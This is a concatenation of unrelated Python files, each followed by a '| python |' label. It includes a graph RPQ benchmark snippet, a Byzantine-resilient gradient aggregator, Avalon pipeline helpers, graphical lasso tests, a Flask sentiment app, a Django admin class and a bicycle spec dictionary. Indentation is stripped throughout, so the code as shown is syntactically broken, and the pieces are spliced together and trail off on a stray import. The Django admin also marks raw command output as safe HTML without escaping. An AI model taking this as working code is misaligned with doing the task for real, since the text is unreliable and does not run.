impl_name = impl['name']
g = impl['impl'].from_txt(graph['graph'])
g_name = graph['name']
r = impl['impl'].from_regex(regex['regex'])
r_name = regex['name']
result_file = f'{g_name}.csv'
result_file_path = f'./benchmarks/benchmark_rpq/results/{result_file}'
headers = [
'Implementation'
, 'Graph'
, 'Regex'
, 'Time (in microseconds)'
, 'Control sum'
]
if not os.path.exists(result_file_path):
with open(result_file_path, mode='w+', newline='\n') as f:
csv_writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, escapechar=' ')
csv_writer.writerow(headers)
with open(result_file_path, mode='a+', newline='\n', buffering=1) as f:
csv_writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, escapechar=' ')
start_time = time.time_ns()
res = rpq(g, r)
end_time = time.time_ns()
result_time = (end_time - start_time) // (10 ** 3)
results = [impl_name, g_name, r_name, result_time, res.select(lib.GxB_NONZERO).nvals]
csv_writer.writerow(results)
| python |
"""
Allen-Zhu Z, Ebrahimian F, Li J, et al. Byzantine-Resilient Non-Convex Stochastic Gradient Descent[J].
arXiv preprint arXiv:2012.14368, 2020.
"""
import torch
import random
from .base import _BaseAggregator
from ..utils import log
class Safeguard(_BaseAggregator):
"""[summary]
Args:
_BaseAggregator ([type]): [description]
"""
def __init__(self, T0, T1, th0, th1, nu, tuningThreshold=False, reset=False):
assert T1 >= T0 >= 1
assert th1 > th0 > 0
self.T0 = T0
self.T1 = T1
self.th0 = th0
self.th1 = th1
self.nu = nu
# reset good set every T1 step
self.reset = reset
self.good = None
# The length of histA should be less than T1
# The element of histA is a list
self.histA = []
# The length of histB should be less than T0
self.histB = []
self.histIndices = []
self.tuningThreshold = tuningThreshold
self.thresholdHistory = {}
def add_to_threshold_hist(self, threshold_name, value):
if threshold_name not in self.thresholdHistory:
self.thresholdHistory[threshold_name] = {}
reformatted_value = "{:.1f}".format(value)
self.thresholdHistory[threshold_name][reformatted_value] = (
self.thresholdHistory[threshold_name].get(reformatted_value, 0) + 1
)
sorted_values = sorted(
self.thresholdHistory[threshold_name].items(), key=lambda x: -x[1]
)
log("=> {} {}".format(threshold_name, sorted_values[:3]))
def adjust_threshold(self, d2m, good, threshold, threshold_name):
"""
Args:
d2m (dict): index -> distance to median. length of all workers.
good (list): The list of current good worker indices.
threshold_name (str): name of the threshold
"""
m = len(d2m)
sorted_values = sorted(d2m.values())
# print(
# "adjust_threshold {}".format(
# ["{:.3f}".format(i.item()) for i in sorted_values]
# )
# )
# Requirement 1: At least half of the workers satisfies d2m[i] <= threshold
candidate_threshold = sorted_values[m // 2] + 0.001
# print(
# "==> {:.1f} {}".format(
# candidate_threshold, ["{:.1f}".format(i.item()) for i in sorted_values]
# )
# )
# Requirement 2: At least one worker in good set is 2 times greater than the threshold
# if any(d2m[i] > 2 * candidate_threshold for i in good):
# # Round to first decimal point
# value = torch.ceil(candidate_threshold * 10) / 10
# self.add_to_threshold_hist(threshold_name, value)
# print(
# "!!!=> {} {:.1f} | {:.1f}".format(
# threshold_name, candidate_threshold, candidate_threshold
# )
# )
# return candidate_threshold
# else:
# print(
# "!!!=> {} {:.1f} | {:.1f}".format(
# threshold_name, candidate_threshold, threshold
# )
# )
# return threshold
# Round to first decimal point
value = torch.ceil(candidate_threshold * 10) / 10
self.add_to_threshold_hist(threshold_name, value)
return candidate_threshold
def compute_distance(self, v1, v2):
return (v1 - v2).norm()
def __str__(self):
return "Safeguard(T0={},T1={},th0={},th1={},nu={})".format(
self.T0, self.T1, self.th0, self.th1, self.nu
)
def find_median_grad(self, grads, threshold, m):
"""[summary]
Args:
grads (dict): node_idx -> gradient
threshold (float): threshold
m (int): number of total nodes
"""
indices = list(grads.keys())
# Since in the experiment we assume the workers indices [0, n-f) are good
# and [n-f, n) are Byzantine. Shuffling removes the bias.
random.shuffle(indices)
distances = {}
counts = {}
for i in indices:
count = 0
for j in indices:
idx = tuple(sorted([i, j]))
distance = self.compute_distance(grads[i], grads[j]).item()
distances[idx] = distances.get(idx, distance)
if distances[idx] <= threshold:
count += 1
if count >= m / 2:
print(
"\nhistA={} | Find median {} among indices={} threshold={} distances={}\n".format(
len(self.histA), i, indices, threshold, distances
)
)
return grads[i]
counts[i] = count
# If no one over m / 2
print(f"counts={counts}")
sorted_counts = sorted(counts.items(), key=lambda x: -x[1])[0]
max_count_indices = []
for k, v in counts.items():
if v == sorted_counts[1]:
max_count_indices.append(k)
random.shuffle(max_count_indices)
print(
"\nhistA={} | (Not Found) Find median {} indices={} threshold={} distances={} max_count_indices={}\n".format(
len(self.histA),
max_count_indices[0],
indices,
threshold,
distances,
max_count_indices,
)
)
print(f"max_count_indices[0]={max_count_indices[0]}")
return grads[max_count_indices[0]]
def __call__(self, inputs):
if self.good is None:
self.good = list(range(len(inputs)))
log(self.good)
self.histA.append(inputs)
self.histB.append(inputs)
self.histIndices.append(self.good.copy())
# Note that A_all and B_all are for tuning threshold.
A = {}
B = {}
A_all = {}
B_all = {}
for node_idx in range(len(inputs)):
Ai = 0
for j in range(1, len(self.histA) + 1):
grad = self.histA[-j][node_idx]
Ai += grad / len(self.histIndices[-j])
Bi = 0
for j in range(1, len(self.histB) + 1):
grad = self.histB[-j][node_idx]
Bi += grad / len(self.histIndices[-j])
A_all[node_idx] = Ai
B_all[node_idx] = Bi
if node_idx in self.good:
A[node_idx] = Ai
B[node_idx] = Bi
# Find the median among the good
A_med = self.find_median_grad(A, self.th1, len(inputs))
B_med = self.find_median_grad(B, self.th0, len(inputs))
# Update good sets
new_goodset = []
d2m_A = {}
d2m_B = {}
for i in range(len(inputs)):
d2m_A[i] = self.compute_distance(A_all[i], A_med)
d2m_B[i] = self.compute_distance(B_all[i], B_med)
# if i in self.good and d2m_A[i] <= 2 * self.th1 and d2m_B[i] <= 2 * self.th0:
if i in self.good and d2m_A[i] <= self.th1 and d2m_B[i] <= self.th0:
new_goodset.append(i)
print(
f"i={i} d2m_A[i]={d2m_A[i]:.3f} d2m_B[i]={d2m_B[i]:.3f} | i in good"
)
else:
print(
f"i={i} d2m_A[i]={d2m_A[i]:.3f} d2m_B[i]={d2m_B[i]:.3f} | i not in good"
)
# if len(new_goodset) < len(inputs) / 2:
# new_goodset = list(range(len(inputs)))
if self.tuningThreshold and len(self.histA) >= self.T1:
self.th1 = self.adjust_threshold(d2m_A, self.good, self.th1, "th1")
if self.tuningThreshold and len(self.histB) >= self.T0:
self.th0 = self.adjust_threshold(d2m_B, self.good, self.th0, "th0")
noise = torch.randn_like(A_med) * self.nu
output = noise + sum(inputs[i] for i in self.good) / len(self.good)
        # update the good set for the next step
        self.good = new_goodset
if len(self.histA) >= self.T1:
self.histA = []
if self.reset:
self.good = list(range(len(inputs)))
if len(self.histB) >= self.T0:
self.histB = []
return output
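# Illustrative usage sketch (all parameter values below are made up): the
# aggregator is constructed once and then called every optimisation step with
# the list of per-worker gradient tensors, e.g.
#     agg = Safeguard(T0=2, T1=6, th0=5.0, th1=10.0, nu=0.001)
#     aggregated = agg([grad_w0, grad_w1, grad_w2])  # torch tensors of equal shape
# T0/T1 are the lengths of the two history windows (histB/histA), th0/th1 the
# corresponding distance thresholds, and nu scales the Gaussian noise added to
# the averaged gradient of the current good set.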
| python |
import os
import re
import logging
import importlib
import itertools
import contextlib
import subprocess
import inspect
from .vendor import pather
from .vendor.pather.error import ParseError
import avalon.io as io
import avalon.api
import avalon
log = logging.getLogger(__name__)
# Special naming case for subprocess since its a built-in method.
def _subprocess(args):
"""Convenience method for getting output errors for subprocess."""
proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
env=os.environ
)
output = proc.communicate()[0]
if proc.returncode != 0:
log.error(output)
raise ValueError("\"{}\" was not successful: {}".format(args, output))
return output
def get_hierarchy(asset_name=None):
"""
Obtain asset hierarchy path string from mongo db
Returns:
string: asset hierarchy path
"""
if not asset_name:
asset_name = io.Session.get("AVALON_ASSET", os.environ["AVALON_ASSET"])
asset_entity = io.find_one({
"type": 'asset',
"name": asset_name
})
not_set = "PARENTS_NOT_SET"
entity_parents = asset_entity.get("data", {}).get("parents", not_set)
# If entity already have parents then just return joined
if entity_parents != not_set:
return "/".join(entity_parents)
# Else query parents through visualParents and store result to entity
hierarchy_items = []
entity = asset_entity
while True:
parent_id = entity.get("data", {}).get("visualParent")
if not parent_id:
break
entity = io.find_one({"_id": parent_id})
hierarchy_items.append(entity["name"])
# Add parents to entity data for next query
entity_data = asset_entity.get("data", {})
entity_data["parents"] = hierarchy_items
io.update_many(
{"_id": asset_entity["_id"]},
{"$set": {"data": entity_data}}
)
return "/".join(hierarchy_items)
def add_tool_to_environment(tools):
"""
    Adds a dynamically composed tool environment to ``os.environ``.
    Args:
        tools (list, tuple): list of tool names; each name should correspond to a json/toml preset
    Returns:
        None: ``os.environ`` is updated in place
"""
import acre
tools_env = acre.get_tools(tools)
env = acre.compute(tools_env)
env = acre.merge(env, current_env=dict(os.environ))
os.environ.update(env)
@contextlib.contextmanager
def modified_environ(*remove, **update):
"""
Temporarily updates the ``os.environ`` dictionary in-place.
The ``os.environ`` dictionary is updated in-place so that the modification
is sure to work in all situations.
:param remove: Environment variables to remove.
:param update: Dictionary of environment variables and values to add/update.
"""
env = os.environ
update = update or {}
remove = remove or []
# List of environment variables being updated or removed.
stomped = (set(update.keys()) | set(remove)) & set(env.keys())
# Environment variables and values to restore on exit.
update_after = {k: env[k] for k in stomped}
# Environment variables and values to remove on exit.
remove_after = frozenset(k for k in update if k not in env)
try:
env.update(update)
[env.pop(k, None) for k in remove]
yield
finally:
env.update(update_after)
[env.pop(k) for k in remove_after]
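# Illustrative usage (the variable names are made up):
#     with modified_environ("VAR_TO_REMOVE", DEBUG_FLAG="1"):
#         ...  # DEBUG_FLAG is set and VAR_TO_REMOVE is absent inside the block
#     # on exit both variables are restored to their previous state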
def pairwise(iterable):
"""s -> (s0,s1), (s2,s3), (s4, s5), ..."""
a = iter(iterable)
return itertools.izip(a, a)
def grouper(iterable, n, fillvalue=None):
"""Collect data into fixed-length chunks or blocks
Examples:
grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
"""
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
def is_latest(representation):
"""Return whether the representation is from latest version
Args:
representation (dict): The representation document from the database.
Returns:
bool: Whether the representation is of latest version.
"""
version = io.find_one({"_id": representation['parent']})
# Get highest version under the parent
highest_version = io.find_one({
"type": "version",
"parent": version["parent"]
}, sort=[("name", -1)], projection={"name": True})
if version['name'] == highest_version['name']:
return True
else:
return False
def any_outdated():
"""Return whether the current scene has any outdated content"""
checked = set()
host = avalon.api.registered_host()
for container in host.ls():
representation = container['representation']
if representation in checked:
continue
representation_doc = io.find_one({"_id": io.ObjectId(representation),
"type": "representation"},
projection={"parent": True})
if representation_doc and not is_latest(representation_doc):
return True
elif not representation_doc:
log.debug("Container '{objectName}' has an invalid "
"representation, it is missing in the "
"database".format(**container))
checked.add(representation)
return False
def _rreplace(s, a, b, n=1):
"""Replace a with b in string s from right side n times"""
return b.join(s.rsplit(a, n))
def version_up(filepath):
"""Version up filepath to a new non-existing version.
Parses for a version identifier like `_v001` or `.v001`
When no version present _v001 is appended as suffix.
Returns:
str: filepath with increased version number
"""
dirname = os.path.dirname(filepath)
basename, ext = os.path.splitext(os.path.basename(filepath))
regex = r"[._]v\d+"
matches = re.findall(regex, str(basename), re.IGNORECASE)
if not matches:
log.info("Creating version...")
new_label = "_v{version:03d}".format(version=1)
new_basename = "{}{}".format(basename, new_label)
else:
label = matches[-1]
version = re.search(r"\d+", label).group()
padding = len(version)
new_version = int(version) + 1
new_version = '{version:0{padding}d}'.format(version=new_version,
padding=padding)
new_label = label.replace(version, new_version, 1)
new_basename = _rreplace(basename, label, new_label)
if not new_basename.endswith(new_label):
index = (new_basename.find(new_label))
index += len(new_label)
new_basename = new_basename[:index]
new_filename = "{}{}".format(new_basename, ext)
new_filename = os.path.join(dirname, new_filename)
new_filename = os.path.normpath(new_filename)
if new_filename == filepath:
raise RuntimeError("Created path is the same as current file,"
"this is a bug")
for file in os.listdir(dirname):
if file.endswith(ext) and file.startswith(new_basename):
log.info("Skipping existing version %s" % new_label)
return version_up(new_filename)
log.info("New version %s" % new_label)
return new_filename
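# Illustrative example (hypothetical path): for "/proj/shots/sh010_v001.ma" the
# "_v001" token is parsed and ".../sh010_v002.ma" is returned, recursing past
# any higher versions already present in the directory.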
def switch_item(container,
asset_name=None,
subset_name=None,
representation_name=None):
"""Switch container asset, subset or representation of a container by name.
It'll always switch to the latest version - of course a different
approach could be implemented.
Args:
container (dict): data of the item to switch with
asset_name (str): name of the asset
subset_name (str): name of the subset
representation_name (str): name of the representation
Returns:
dict
"""
if all(not x for x in [asset_name, subset_name, representation_name]):
raise ValueError("Must have at least one change provided to switch.")
# Collect any of current asset, subset and representation if not provided
# so we can use the original name from those.
if any(not x for x in [asset_name, subset_name, representation_name]):
_id = io.ObjectId(container["representation"])
representation = io.find_one({"type": "representation", "_id": _id})
version, subset, asset, project = io.parenthood(representation)
if asset_name is None:
asset_name = asset["name"]
if subset_name is None:
subset_name = subset["name"]
if representation_name is None:
representation_name = representation["name"]
# Find the new one
asset = io.find_one({"name": asset_name, "type": "asset"})
assert asset, ("Could not find asset in the database with the name "
"'%s'" % asset_name)
subset = io.find_one({"name": subset_name,
"type": "subset",
"parent": asset["_id"]})
assert subset, ("Could not find subset in the database with the name "
"'%s'" % subset_name)
version = io.find_one({"type": "version",
"parent": subset["_id"]},
sort=[('name', -1)])
assert version, "Could not find a version for {}.{}".format(
asset_name, subset_name
)
representation = io.find_one({"name": representation_name,
"type": "representation",
"parent": version["_id"]})
assert representation, ("Could not find representation in the database with"
" the name '%s'" % representation_name)
avalon.api.switch(container, representation)
return representation
def _get_host_name():
_host = avalon.api.registered_host()
# This covers nested module name like avalon.maya
return _host.__name__.rsplit(".", 1)[-1]
def get_asset(asset_name=None):
entity_data_keys_from_project_when_miss = [
"frameStart", "frameEnd", "handleStart", "handleEnd", "fps",
"resolutionWidth", "resolutionHeight"
]
entity_keys_from_project_when_miss = []
alternatives = {
"handleStart": "handles",
"handleEnd": "handles"
}
defaults = {
"handleStart": 0,
"handleEnd": 0
}
if not asset_name:
asset_name = avalon.api.Session["AVALON_ASSET"]
asset_document = io.find_one({"name": asset_name, "type": "asset"})
if not asset_document:
raise TypeError("Entity \"{}\" was not found in DB".format(asset_name))
project_document = io.find_one({"type": "project"})
for key in entity_data_keys_from_project_when_miss:
if asset_document["data"].get(key):
continue
value = project_document["data"].get(key)
if value is not None or key not in alternatives:
asset_document["data"][key] = value
continue
alt_key = alternatives[key]
value = asset_document["data"].get(alt_key)
if value is not None:
asset_document["data"][key] = value
continue
value = project_document["data"].get(alt_key)
if value:
asset_document["data"][key] = value
continue
if key in defaults:
asset_document["data"][key] = defaults[key]
for key in entity_keys_from_project_when_miss:
if asset_document.get(key):
continue
value = project_document.get(key)
if value is not None or key not in alternatives:
asset_document[key] = value
continue
alt_key = alternatives[key]
value = asset_document.get(alt_key)
if value:
asset_document[key] = value
continue
value = project_document.get(alt_key)
if value:
asset_document[key] = value
continue
if key in defaults:
asset_document[key] = defaults[key]
return asset_document
def get_project():
io.install()
return io.find_one({"type": "project"})
def get_version_from_path(file):
"""
Finds version number in file path string
Args:
file (string): file path
Returns:
v: version number in string ('001')
"""
pattern = re.compile(r"[\._]v([0-9]+)")
try:
return pattern.findall(file)[0]
except IndexError:
log.error(
"templates:get_version_from_workfile:"
"`{}` missing version string."
"Example `v004`".format(file)
)
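# Illustrative example: get_version_from_path("sh010_comp_v004.nk") returns "004";
# a path without a "_v###"/".v###" token logs an error and returns None.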
def get_avalon_database():
if io._database is None:
set_io_database()
return io._database
def set_io_database():
required_keys = ["AVALON_PROJECT", "AVALON_ASSET", "AVALON_SILO"]
for key in required_keys:
os.environ[key] = os.environ.get(key, "")
io.install()
def get_all_avalon_projects():
db = get_avalon_database()
projects = []
for name in db.collection_names():
projects.append(db[name].find_one({'type': 'project'}))
return projects
def filter_pyblish_plugins(plugins):
"""
    This serves as a plugin filter / modifier for pyblish. It will load plugin
definitions from presets and filter those needed to be excluded.
:param plugins: Dictionary of plugins produced by :mod:`pyblish-base`
`discover()` method.
:type plugins: Dict
"""
from pypeapp import config
from pyblish import api
host = api.current_host()
presets = config.get_presets().get('plugins', {})
# iterate over plugins
for plugin in plugins[:]:
# skip if there are no presets to process
if not presets:
continue
file = os.path.normpath(inspect.getsourcefile(plugin))
file = os.path.normpath(file)
# host determined from path
host_from_file = file.split(os.path.sep)[-3:-2][0]
plugin_kind = file.split(os.path.sep)[-2:-1][0]
try:
config_data = presets[host]["publish"][plugin.__name__]
except KeyError:
try:
config_data = presets[host_from_file][plugin_kind][plugin.__name__] # noqa: E501
except KeyError:
continue
for option, value in config_data.items():
if option == "enabled" and value is False:
log.info('removing plugin {}'.format(plugin.__name__))
plugins.remove(plugin)
else:
log.info('setting {}:{} on plugin {}'.format(
option, value, plugin.__name__))
setattr(plugin, option, value)
def get_subsets(asset_name,
regex_filter=None,
version=None,
representations=["exr", "dpx"]):
"""
Query subsets with filter on name.
    The method will return all found subsets together with their resolved version and representations. The version can be specified by number; representations can be filtered.
Arguments:
asset_name (str): asset (shot) name
regex_filter (raw): raw string with filter pattern
version (str or int): `last` or number of version
representations (list): list for all representations
Returns:
dict: subsets with version and representaions in keys
"""
from avalon import io
# query asset from db
asset_io = io.find_one({"type": "asset",
"name": asset_name})
# check if anything returned
assert asset_io, "Asset not existing. \
Check correct name: `{}`".format(asset_name)
# create subsets query filter
filter_query = {"type": "subset", "parent": asset_io["_id"]}
# add reggex filter string into query filter
if regex_filter:
filter_query.update({"name": {"$regex": r"{}".format(regex_filter)}})
else:
filter_query.update({"name": {"$regex": r'.*'}})
# query all assets
subsets = [s for s in io.find(filter_query)]
assert subsets, "No subsets found. Check correct filter. Try this for start `r'.*'`: asset: `{}`".format(asset_name)
output_dict = {}
# Process subsets
for subset in subsets:
if not version:
version_sel = io.find_one({"type": "version",
"parent": subset["_id"]},
sort=[("name", -1)])
else:
assert isinstance(version, int), "version needs to be `int` type"
version_sel = io.find_one({"type": "version",
"parent": subset["_id"],
"name": int(version)})
find_dict = {"type": "representation",
"parent": version_sel["_id"]}
filter_repr = {"$or": [{"name": repr} for repr in representations]}
find_dict.update(filter_repr)
repres_out = [i for i in io.find(find_dict)]
if len(repres_out) > 0:
output_dict[subset["name"]] = {"version": version_sel,
"representaions": repres_out}
return output_dict
| python |
import numpy as np
import pytest
from numpy.testing import assert_raises
from numpy.testing import assert_allclose
from sklearn import datasets
from inverse_covariance import (
QuicGraphicalLasso,
QuicGraphicalLassoCV,
QuicGraphicalLassoEBIC,
quic,
)
def custom_init(X):
init_cov = np.cov(X, rowvar=False)
return init_cov, np.max(np.abs(np.triu(init_cov)))
class TestQuicGraphicalLasso(object):
@pytest.mark.parametrize(
"params_in, expected",
[
(
{},
[
3.2437533337151625,
3.4490549523890648,
9.7303201146340168,
3.673994442010553e-11,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
),
(
{"lam": 0.5, "mode": "trace"},
[
3.2437533337151625,
3.4490549523890652,
32.290292419357321,
0.21836515326396364,
],
), # NOQA
(
{
"lam": 0.5,
"mode": "path",
"path": np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5]),
},
[
8.3256240637201717,
9.7862122341861983,
22.752074276274861,
1.6530965731149066e-08,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "cov"},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": custom_init},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "spearman"},
[3.1622776601683795, 3.1622776601683795, 10.0, 1.7763568394002505e-15],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "kendalltau"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
],
)
def test_integration_quic_graphical_lasso(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLasso(**params_in)
ic.fit(X)
result_vec = [
np.linalg.norm(ic.covariance_),
np.linalg.norm(ic.precision_),
np.linalg.norm(ic.opt_),
np.linalg.norm(ic.duality_gap_),
]
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
@pytest.mark.parametrize(
"params_in, expected",
[
(
{},
[
3.2437533337151625,
3.4490549523890648,
9.7303201146340168,
3.673994442010553e-11,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
),
(
{"lam": 0.5, "mode": "trace"},
[
3.2437533337151625,
3.4490549523890652,
32.290292419357321,
0.21836515326396364,
],
), # NOQA
(
{
"lam": 0.5,
"mode": "path",
"path": np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5]),
},
[
8.3256240637201717,
9.7862122341861983,
22.752074276274861,
1.6530965731149066e-08,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "cov"},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "spearman"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "kendalltau"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_fun(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
lam = 0.5
if "lam" in params_in:
lam = params_in["lam"]
del params_in["lam"]
S = np.corrcoef(X, rowvar=False)
if "init_method" in params_in:
if params_in["init_method"] == "cov":
S = np.cov(X, rowvar=False)
del params_in["init_method"]
precision_, covariance_, opt_, cpu_time_, iters_, duality_gap_ = quic(
S, lam, **params_in
)
result_vec = [
np.linalg.norm(covariance_),
np.linalg.norm(precision_),
np.linalg.norm(opt_),
np.linalg.norm(duality_gap_),
]
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
@pytest.mark.parametrize(
"params_in, expected",
[
(
{"n_refinements": 1},
[4.6528, 32.335, 3.822, 1.5581289048993696e-06, 0.01],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
},
[4.6765, 49.24459, 3.26151, 6.769744583801085e-07],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "cov",
},
[0.0106, 21634.95296, 57.6289, 0.00039],
),
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": custom_init,
},
[0.0106, 21634.95296, 57.6289, 0.00039],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "spearman",
},
[
4.8315707207048622,
38.709631332689789,
2.8265068394116657,
1.5312382906085276e-07,
],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "kendalltau",
},
[
4.9007318106601074,
85.081499460930743,
2.0463861650623159,
0.00012530384889419821,
],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_cv(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLassoCV(**params_in)
ic.fit(X)
result_vec = [
np.linalg.norm(ic.covariance_),
np.linalg.norm(ic.precision_),
np.linalg.norm(ic.opt_),
np.linalg.norm(ic.duality_gap_),
]
if isinstance(ic.lam_, float):
result_vec.append(ic.lam_)
elif isinstance(ic.lam_, np.ndarray):
assert ic.lam_.shape == params_in["lam"].shape
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
assert len(ic.grid_scores_) == len(ic.cv_lams_)
@pytest.mark.parametrize(
"params_in, expected",
[
({}, [3.1622776601683795, 3.1622776601683795, 0.91116275611548958]),
({"lam": 0.5 * np.ones((10, 10))}, [4.797, 2.1849]),
(
{"lam": 0.5 * np.ones((10, 10)), "init_method": custom_init},
[0.0106, 35056.88460],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_ebic(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLassoEBIC(**params_in)
ic.fit(X)
result_vec = [np.linalg.norm(ic.covariance_), np.linalg.norm(ic.precision_)]
if isinstance(ic.lam_, float):
result_vec.append(ic.lam_)
elif isinstance(ic.lam_, np.ndarray):
assert ic.lam_.shape == params_in["lam"].shape
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
def test_invalid_method(self):
"""
Test behavior of invalid inputs.
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLasso(method="unknownmethod")
assert_raises(NotImplementedError, ic.fit, X)
| python |
# -*- coding: utf-8 -*-
from tests import AbstractTestCase
class FeaturesTestCase(AbstractTestCase):
"""
Test case for the methods related to the font features.
"""
def test_get_features(self):
font = self._get_font("/Roboto_Mono/static/RobotoMono-Regular.ttf")
features = font.get_features()
self.assertEqual(
features,
[
{
"tag": "smcp",
"name": "Small Capitals",
"exposed": True,
"exposed_active": False,
}
],
)
def test_get_features_tags(self):
font = self._get_font("/Roboto_Mono/static/RobotoMono-Regular.ttf")
features = font.get_features_tags()
self.assertEqual(features, ["smcp"])
| python |
from flask import Flask, render_template, request
from transformers import pipeline
from transformers import RobertaTokenizer, RobertaForSequenceClassification
tokenizer = RobertaTokenizer.from_pretrained("pdelobelle/robBERT-base")
model = RobertaForSequenceClassification.from_pretrained("dbrd_model2_copy")
app = Flask('NLP')
@app.route('/')
def home():
return render_template('home.html')
@app.route('/predict', methods=['POST'])
def predict():
sentence_clasf = pipeline('sentiment-analysis', model = model, tokenizer = tokenizer)
if request.method == 'POST':
input_sent = request.form['message']
output = sentence_clasf(input_sent)
pred_label = output[0]['label']
if pred_label == "LABEL_1":
prediction = "Positive"
elif pred_label == "LABEL_0":
prediction = "Negative"
else:
prediction = "Unable to classify"
probability = round((output[0]['score'] * 100), 2)
return render_template('result.html', content = input_sent, prediction = prediction, prob = probability)
if __name__ == '__main__':
app.run(debug=True)
| python |
__author__ = 'Michael Foord'
| python |
from __future__ import annotations
import ast
import json
from django.contrib import admin
from django.utils.safestring import mark_safe
from command_log.models import ManagementCommandLog
def pretty_print(data: dict | None) -> str:
"""Convert dict into formatted HTML."""
if data is None:
return ""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
    html = pretty.replace(" ", " ").replace("\n", "<br>")
return mark_safe("<pre><code>%s</code></pre>" % html) # noqa: S308, S703
class ManagementCommandLogAdmin(admin.ModelAdmin):
list_display = ("management_command", "started_at", "duration", "exit_code_display")
list_filter = ("started_at", "app_name", "command_name", "exit_code")
search_fields = ("command_name",)
readonly_fields = (
"management_command",
"started_at",
"finished_at",
"duration",
"exit_code",
"_output",
"error",
"truncate_at",
)
exclude = ("app_name", "command_name", "output")
def _output(self, obj: ManagementCommandLog) -> str:
"""Format output as JSON if applicable."""
try:
data = ast.literal_eval(obj.output)
return pretty_print(data)
except Exception: # noqa: B902
return mark_safe( # noqa: S308, S703
f"<pre><code>{obj.output}</code></pre>"
)
_output.short_description = "Output (formatted)" # type: ignore
def exit_code_display(self, obj: ManagementCommandLog) -> bool | None:
"""Display NullBoolean icons for exit code."""
if obj.exit_code == ManagementCommandLog.EXIT_CODE_PARTIAL:
return None
return obj.exit_code == ManagementCommandLog.EXIT_CODE_SUCCESS
exit_code_display.boolean = True # type: ignore
exit_code_display.short_description = "Exit code" # type: ignore
admin.site.register(ManagementCommandLog, ManagementCommandLogAdmin)
| python |
bicycle = {'Price': '------', 'Brand': '------', 'Model': '------', 'Frame': '------', 'Color': '------', 'Size': '------', 'Fork': '------', 'Headset': '------', 'Stem': '------', 'Handlebar': '------', 'Grips': '------', 'Rear Derailleur': '------', 'Front Derailleur': '------', 'Shifter': '------', 'Brake': '------', 'Crankset': '------', 'Cassette': '------', 'Chain': '------', 'Rims': '------', 'Hub Front': '------', 'Hub Rear': '------', 'Tires': '------', 'Pedals': '------', 'Saddle': '------', 'Seat Post': '------', 'Seat Post Clamp': '------', 'Weight (KG)': '------', 'Bike Type:': '------', 'Target Group:': '------', 'Material:': '------', 'Wheel Size:': '------', 'Model year:': '------', 'Front Light': '------', 'Rear Light': '------', 'Kickstand': '------', 'Mudguards': '------', 'Bell': '------', 'Other properties:': '------', 'Tire Front': '------', 'Tire Rear': '------', 'Wheelset': '------', 'Rack': '------', 'Handlebaraufsatz': '------', 'Handlebarband': '------', 'Shifter/Brakelever': '------', 'Brake-Type:': '------', 'Brakes': '------', 'Brake Lever': '------', 'Shock': '------', 'Shock-hardware': '------', 'Hubsritzel': '------', 'Chain Guide': '------', 'Number of gears': '------', 'Bottom Bracket': '------', 'Brake Discs': '------', 'Front rim': '------', 'Rim rear': '------', 'Spokes': '------', 'Drive Unit': '------', 'Battery': '------', 'Display': '------', 'Charger': '------', 'Derailleur hanger': '------', 'Maximum weight allowed': '------', 'Chain Guard': '------', 'Weight (LBS)': '------'} | python |
from PyMdlxConverter.common.binarystream import BinaryStream
